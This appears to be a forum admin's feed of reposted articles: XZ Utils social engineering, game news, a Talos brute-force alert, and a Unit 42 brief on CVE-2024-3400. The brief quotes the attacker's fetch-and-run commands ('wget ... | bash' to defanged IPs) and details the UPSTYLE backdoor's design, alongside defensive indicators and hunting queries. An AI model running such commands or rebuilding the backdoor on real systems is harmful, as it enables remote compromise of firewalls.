Jump to content

SeedTheNet

Administrators
 View Profile  See their activity

  • Posts

    965

  • Joined

  • Last visited

  • Days Won

    7

SeedTheNet last won the day on April 14

SeedTheNet had the most liked content!

Reputation

13 Good

2 Followers

About SeedTheNet

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. SeedTheNet
    More information about "Unveiling the Intricate Social Engineering Behind Open-Source Supply Chain Attacks - Kaspersky Securelist Report"
    In the realm of advanced persistent threats (APTs), sophisticated social engineering tactics are becoming increasingly prevalent, especially in orchestrating supply chain attacks within the open-source community. Recent revelations shed light on high-end APT groups employing intricate social engineering campaigns to breach well-defended targets and propagate malicious code. One such instance involves a meticulously orchestrated scheme targeting the XZ Utils project, a venerable open-source initiative, and its maintainer, Lasse Collin. The offensive effort unfolded gradually, introducing a network of remote personas, deceptive communications, and malicious code into the project's ecosystem. The ultimate objective? To stealthily implant an exclusive-use backdoor into sshd by exploiting vulnerabilities in the XZ Utils build process, with the intent of infiltrating major Linux distributions through a large-scale supply chain attack. The campaign's modus operandi reflects a learned approach, characterized by precise forum responses tailored to specific accounts and "out-of-band" interactions, strategically engaging targets such as underground rail system simulator software users in the Middle East. This nuanced strategy was exemplified by the delivery of Green Lambert implants, showcasing the adeptness of APT groups in leveraging social engineering for nefarious ends. The infiltration, primarily orchestrated by the potentially fictitious persona Jia Cheong Tan, saw the insertion of backdoor code into XZ Utils during the months of February and March 2024. While the execution of the penetration may have appeared somewhat clumsy, the meticulous planning and patience exhibited over multiple years underscore the sophistication of the operation. The implications of such supply chain attacks extend beyond individual projects, highlighting the vulnerability of open-source ecosystems to covert manipulation. As the open-source community remains a cornerstone of technological innovation, safeguarding against social engineering-driven threats demands heightened vigilance, robust security protocols, and collaborative efforts to fortify the integrity of supply chains. The exposure of this intricate social engineering endeavor serves as a stark reminder of the evolving threat landscape, urging stakeholders to remain vigilant and proactive in defending against sophisticated APT tactics targeting the heart of open-source collaboration. The original article : Social engineering for open-source supply chain attack profit High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up “out-of-band” interactions regarding underground rail system simulator software helped deliver Green Lambert implants in the Middle East. And, in what seems to be a learned approach, the XZ Utils project penetration was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed. This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack. While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM Solarwinds compromise and the SUNSPOT implant’s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it’s human involvement in the build process. It’s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary’s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight. One of the best publicly available chronological timelines on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It’s highly recommended reading. Notably, Cox writes: “This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.” A Singaporean guy, an Indian guy, and a German guy walk into a bar… Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils developer mailing lists and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer. Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities’ communications. The “Jia Tan” identity seems a bit forced as well – the only public geolocation data is a Singaporean VPN exit node that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource. Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a “jiat75” or “jiatan018” username for the “Jia Tan” Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the “JiaT75” actor. One additional identity, Hans Jansen, introduced a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75’s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: “Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)”. This pull request is the Jansen identities’ only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a Debian bug report on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution. Jia Tan Identity and Activity The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022. oss-fuzz cpp-docs wasmtime xz These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well. The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 authored hundreds of changes for the XZ project. Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias “Alden” posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024. The time differences for the malicious commits is noticeable. What might this anomaly suggest? We speculate on several possibilities: the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor. the JiaT75 individual contributor was rushed to commit the malicious backdoor code. the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day. Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized. Summer 2022 Pressure to Add a Maintainer Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact. Name GitHub Account Email Creation Jia Tan/Jia Cheong Tan JiaT75 jiat0218@gmail.com January 26, 2021 Dennis Ens – dennis3ns@gmail.com – Jigar Kumar – jigarkumar17@protonmail.com – If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a superficial code patch on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project. A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads. Wed, 27 Apr 2022 11:42:57 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.” Thu, 28 Apr 2022 10:10:48 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There is no reason to think anything is coming soon.” Fri, 27 May 2022 10:49:47 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Over 1 month and no closer to being merged. Not a suprise.” Tue, 07 Jun 2022 09:00:18 -0700 Re: [xz-devel] XZ for Java “Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.” Tue, 14 Jun 2022 11:16:07 -0700 Re: [xz-devel] XZ for Java “With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?” Wed, 22 Jun 2022 10:05:06 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string “Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?” The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: “Dennis you are better off waiting until new maintainer happens or fork yourself.” Thu, 19 May 2022 12:26:03 -0700 XZ for Java “Is XZ for Java still maintained? I asked a question here a week ago and have not heard back. When I view the git log I can see it has not updated in over a year. I am looking for things like multithreaded encoding / decoding and a few updates that Brett Okken had submitted (but are still waiting for merge). Should I add these things to only my local version, or is there a plan for these things in the future?” Tue, 21 Jun 2022 13:24:47 -0700 Re: [xz-devel] XZ for Java I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C? Trying to maintain both means that neither are maintained well. Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation: In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks. Spring 2024 Pressure to Import Backdoored Code to Debian Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a Debian report log on March 25, 2024 to raise urgency to include the backdoored code: “Dear mentors, I am looking for a sponsor for my package “xz-utils”.” Name Email address Hans Jansen hansjansen162@outlook.com krygorin4545 krygorin4545@proton.me misoeater91@tutamail.com misoeater91@tutamail.com The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com: Date: Tue, 26 Mar 2024 19:27:47 +0000 From: krygorin4545 <krygorin4545@proton.me> Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression utilities Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET) From: misoeater91@tutamail.com Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans! The code changes received pushback from Debian contributors: Date: Tue, 26 Mar 2024 19:27:47 +0000 From: krygorin4545 <krygorin4545@proton.me> Subject: new upstream versions as NMU vs. xz maintenance Very much *not* a fan of NMUs doing large changes such as new upstream versions.But this does give us the question, what’s up with the maintenance of xz-utils? Same as with the lack of security uploads of git, which you also maintain, are you active? Are you well? To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes: Date: Wed, 27 Mar 2024 12:46:32 +0000 From: krygorin4545 <krygorin4545@proton.me> Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn’t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (). Fixing a valgrind break across many apps throughout Debian is the priority here. What NeXZt? Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at prior SAS events [registration required], distilling an assessment into a manageable table. Unfortunately, we expect more open-source project incidents like XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified similar social engineering-driven incidents in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident. https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/
  2. SeedTheNet
    More information about "Will Sony one day revive Fat Princess?"
    Fat Princess, a quirky and beloved multiplayer action game released by Sony, has left a lasting impression on gamers since its debut. However, the game's discontinuation has sparked a wave of nostalgia and calls from fans for its revival. Originally released in 2009 for the PlayStation 3, Fat Princess quickly gained a dedicated following thanks to its unique blend of strategy, humor, and chaotic multiplayer battles. The game's premise, centered around rescuing a princess who can become harder to save as she consumes cake, delighted players and offered a refreshing take on the multiplayer genre. Despite its initial success and popularity, Fat Princess eventually faced the unfortunate fate of being discontinued by Sony. This decision left many fans disappointed and longing to revisit the whimsical world of cake-fueled warfare. Fans argue that a revival of Fat Princess would be well-received in today's gaming landscape, where multiplayer experiences and unique gameplay concepts continue to thrive. The game's lighthearted tone, strategic depth, and emphasis on teamwork could resonate with a wide audience, offering a refreshing alternative to more mainstream titles. Moreover, the advancements in online infrastructure and gaming platforms present an opportunity for Fat Princess to make a triumphant return with enhanced features, improved connectivity, and potential cross-platform play. As people have became sensitive to everything in the modern days , would they also be sensitive to the game name and overweight people? But what we should see is another Fat Princess game!. Fat Princess can be played in RPCS3 for the Nostalgia!
  3. SeedTheNet
    More information about "Sony shutdown Little Big Planet 3 servers."
    In January 2024, LittleBigPlanet 3 encountered persistent technical issues that led to the temporary shutdown of its servers for PS4. However, due to ongoing challenges, the decision has been made to keep the servers offline indefinitely. This means that all online services, including access to other players' creations, are no longer available. While this is undoubtedly disappointing news for the LittleBigPlanet 3 community, there are some important details to note. User-generated content (UGC) stored locally on your PS4 will still be accessible, allowing you to continue enjoying previously created content. However, any new UGC you create will be limited to local play on your PS4 and cannot be shared online. Despite the discontinuation of online services, offline features such as the campaign will remain fully playable. This ensures that players can still experience the core gameplay elements and enjoy the game's content independently of online connectivity. It's important for players to be aware of these changes and adjust their gameplay expectations accordingly. While the loss of online services is regrettable, LittleBigPlanet 3 still offers a rich single-player experience and access to locally stored user-generated content. The decision to keep the servers offline indefinitely reflects the challenges faced in maintaining online infrastructure and ensuring a stable and enjoyable experience for players. As the gaming landscape evolves, developers and publishers must make decisions that prioritize the long-term viability of their games while also considering the needs and expectations of their player base. https://www.playstation.com/en-us/legal/gameservers/
  4. SeedTheNet
    More information about "Cisco Talos Alerts on Global Surge of Brute-Force Attacks: TOR Exit Nodes and Anonymizing Tunnels Identified as Origins"
    Cisco Talos, along with the Duo Security Research team, extends its gratitude to Brandon White, Phillip Schafer, Mike Moran, and Becca Lynch for their groundbreaking research that has uncovered a concerning trend in cyberattacks. Since March 18, 2024, Cisco Talos has been closely monitoring a significant rise in brute-force attacks targeting various entities globally. These attacks are directed towards Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, posing a serious threat to cybersecurity. What's particularly alarming is that these attacks are emanating from TOR exit nodes, as well as a spectrum of other anonymizing tunnels and proxies. This sophisticated approach to conceal the attackers' identities makes it challenging to trace and thwart these malicious activities effectively. The repercussions of successful attacks of this nature can be severe, ranging from unauthorized network access and account lockouts to potential denial-of-service (DoS) scenarios. As the frequency of these attacks continues to escalate, it's imperative for organizations to fortify their defenses and remain vigilant against evolving threats. While the list of known affected services includes VPN services, web authentication interfaces, and SSH services, it's crucial to note that these attacks may extend to other services as well. Organizations across various sectors must be proactive in implementing robust security measures to mitigate the risks posed by these brute-force attacks. Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below. However, additional services may be impacted by these attacks. Cisco Secure Firewall VPN Checkpoint VPN Fortinet VPN SonicWall VPN RD Web Services Miktrotik Draytek Ubiquiti The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to: TOR VPN Gate IPIDEA Proxy BigMama Proxy Space Proxies Nexus Proxy Proxy Rack Cisco Talos remains committed to monitoring and analyzing these threats, collaborating with industry experts, and providing timely insights and solutions to safeguard digital infrastructures against emerging cyber threats. https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
  5. SeedTheNet
    More information about "Fallout 4 New Gen Update & TV Show bringing back players to the Games!"
    In a surprising twist of events, the recent release of Amazon's highly anticipated Fallout TV show has reignited interest in the iconic Fallout game series. Fans old and new are diving back into the post-apocalyptic world, drawn by the show's captivating narrative and nostalgic allure. What sets the Fallout TV show apart is its faithful adaptation of the game universe, capturing the essence of the series and translating it into a compelling visual narrative. This authenticity has resonated with viewers, inspiring many to pick up the controller and experience the wasteland firsthand. For existing fans, the show serves as a nostalgic reminder of their adventures in the Fallout universe, while newcomers are intrigued by the unique blend of retro-futurism, dark humor, and moral dilemmas that define the games. The connection between the TV show and the games has created a symbiotic relationship, with each medium complementing the other to create a richer, more immersive experience. As discussions and excitement around Fallout continue to grow, the community is buzzing with theories, fan creations, and shared experiences. With the Fallout TV show acting as a catalyst, the games are once again in the spotlight, drawing in players old and new to explore the radioactive ruins, face off against mutated creatures, and navigate the complexities of a post-nuclear world. Looking at the SteamDB.info website , it shows that there is a GAIN of +139.0% which brought around 35k players more Fallout 4 : Fallout 3 saw a small jump : Fallout 76 124% which is around 15k players more The Fallout 4 next-gen upgrade is slated for release on April 25
  6. SeedTheNet
    More information about "Operation MidnightEclipse - Post-Exploitation Activity Related to CVE-2024-3400 - Palo Alto Report"
    When it comes to cybersecurity, staying ahead of the game is crucial. Palo Alto Networks, along with Unit 42, is actively monitoring and responding to the latest security challenges that could affect networks worldwide. One such challenge is the critical command injection vulnerability known as CVE-2024-3400, which poses a serious risk to users of Palo Alto Networks PAN-OS software. This article takes a closer look at CVE-2024-3400, emphasizing its severity with a CVSS score of 10.0 A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted. Required Configuration for Exposure This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled. You can verify whether you have a GlobalProtect gateway or GlobalProtect portal configured by checking for entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals) and verify whether you have device telemetry enabled by checking your firewall web interface (Device > Setup > Telemetry). Severity: CRITICAL CVSSv4.0 Base Score: 10 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/AU:Y/R:U/V:C/RE:M/U:Red) Exploitation Status Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability. More information about the vulnerability's exploitation in the wild can be found in the Unit 42 threat brief: https://unit42.paloaltonetworks.com/cve-2024-3400/. Weakness Type CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') Solution This issue will be fixed in hotfix releases of PAN-OS 10.2.9-h1 (ETA: By 4/14), PAN-OS 11.0.4-h1 (ETA: By 4/14), and PAN-OS 11.1.2-h3 (ETA: By 4/14), and in all later PAN-OS versions. Workarounds and Mitigations Recommended Mitigation: Customers with a Threat Prevention subscription can block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184 for more information. If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. Please see the following page for details on how to temporarily disable device telemetry: https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/device-telemetry/device-telemetry-configure/device-telemetry-disable. Executive Summary Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with a GlobalProtect gateway and device telemetry enabled. This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access. For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue. Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor. We also assess that additional threat actors may attempt exploitation in the future. This threat brief will cover information about the vulnerability and what we know about post-exploitation. We will share interim guidance to mitigate the vulnerability, though readers should also refer to the security advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available. If you believe your firewall has been compromised, please reach out to Palo Alto Networks support. This issue will be fixed in an upcoming release of PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1 and all later PAN-OS versions by ETA April 14, 2024. As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity. We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis. Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways: Palo Alto Networks recommends customers with a Threat Prevention subscription block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information. If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE. The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk. Vulnerabilities Discussed CVE-2024-3400 Table of Contents Details of the Vulnerability Current Scope of the Attack Interim Guidance Unit 42 Managed Threat Hunting Queries Conclusion Palo Alto Networks Product Protections for CVE-2024-3400 Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention Cortex XDR, XSIAM and the Unified Cloud Agent Cortex Xpanse and XSIAM ASM Module Indicators of Compromise UPSTYLE Backdoor Command and Control Infrastructure Hosted Python Backdoor Observed Commands Additional Resources Details of the Vulnerability A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with both a GlobalProtect gateway and device telemetry enabled. You can verify whether you have these features configured by checking for entries in your firewall web interface. Our security advisory includes a link to further instructions on how to temporarily disable device telemetry. Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed. Current Scope of the Attack As part of the activity observed in Operation MidnightEclipse, after exploitation, the threat actor created a cronjob that would run every minute to access commands hosted on an external server that would execute via bash, as seen in the following command: wget -qO- hxxp://172.233.228[.]93/policy | bash We were unable to access the commands executed via this URL. However, we believe this URL was used to deploy a second Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE. The UPSTYLE backdoor uploaded to the firewall was hosted at hxxp://144.172.79[.]92/update.py, but we saw a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, it appears the threat actor last modified it on April 7, 2024. 1 2 3 4 5 6 7 8 9 10 11 12 13 Accept-Ranges: bytes Content-Length: 5187 Content-Type: application/octet-stream Date: Thu, 11 Apr 2024 16:12:16 GMT Etag: "6612443d-1443" Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT Server: nginx/1.18.0 (Ubuntu) The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers. First, update.py writes another Python script to the following location: [snip]/site-packages/system.pth The Python script written to system.pth Base64 decodes an embedded Python script and executes it. This embedded Python script has two functions named protect and check, which are called in that order. The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running another Base64 embedded Python script, which is the functional backdoor. The Python script run by system.pth has a function named __main that will run in a thread. This function first reads the contents of the following file, along with its access and modified times: [snip]/css/bootstrap.min.css It then enters an infinite loop that iterates once every two seconds, reading in the following file: [snip]/sslvpn_ngx_error.log The script will then iterate through each line of the file and search the line for the threat actor's command using the following regular expression: img\[([a-zA-Z0-9+/=]+)\] If the above regular expression matches, the script will Base64 encode the contents of the command and run it using the popen method within Python's OS module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which essentially prunes the lines that contain commands from persisting in the sslvpn_ngx_error.log file for later analysis. After running the command, the script writes the output of the command to the following file: [snip]/css/bootstrap.min.css The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals. The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file. Using the initial backdoor in the crontab, we have evidence of a handful of the commands the threat actor ran on the firewall. The commands include copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor: 66.235.168[.]222 We also observed the threat actor running another command to receive commands from a slightly different URL as the cronjob backdoor: wget -qO- hxxp://172.233.228[.]93/patch|bash Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs. Interim Guidance Please refer to the Palo Alto Networks security advisory on CVE-2024-3400 for the most current interim guidance for mitigating the vulnerability. Unit 42 Managed Threat Hunting Queries The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation. 1 2 3 4 // Description: Search for domain IOC in raw NGFW logs dataset = panw_ngfw_url_raw | filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com" | fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid 1 2 3 4 5 // Description: Detect hits for the specific prevention signature for CVE-2024-3400 config case_sensitive = false | dataset = panw_ngfw_threat_raw | filter threat_id = "95187" | fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, * 1 2 3 4 5 // Description: Hits for known IOCs in NGFW traffic config case_sensitive = false | dataset = panw_ngfw_traffic_raw | filter source_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") or dest_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") | fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason 1 2 3 4 5 6 // Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW) config case_sensitive = false | dataset = xdr_data | filter event_type = ENUM.STORY | filter action_remote_ip in ("172.233.228.93", "66.235.168.222", "144.172.79.92") OR dns_query_name ~= ".nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~= ".nhdata.s3-us-west-2.amazonaws.com" | fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname Conclusion The security advisory will continue to provide up to date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation. Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis. Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. Protections and mitigations for the observed exploitation activity are below and will be updated as more become available. Palo Alto Networks Product Protections for CVE-2024-3400 Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America Toll-Free: 866.486.4842 (866.4.UNIT42) EMEA: +31.20.299.3130 APAC: +65.6983.8730 Japan: +81.50.1790.0200 Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signature: 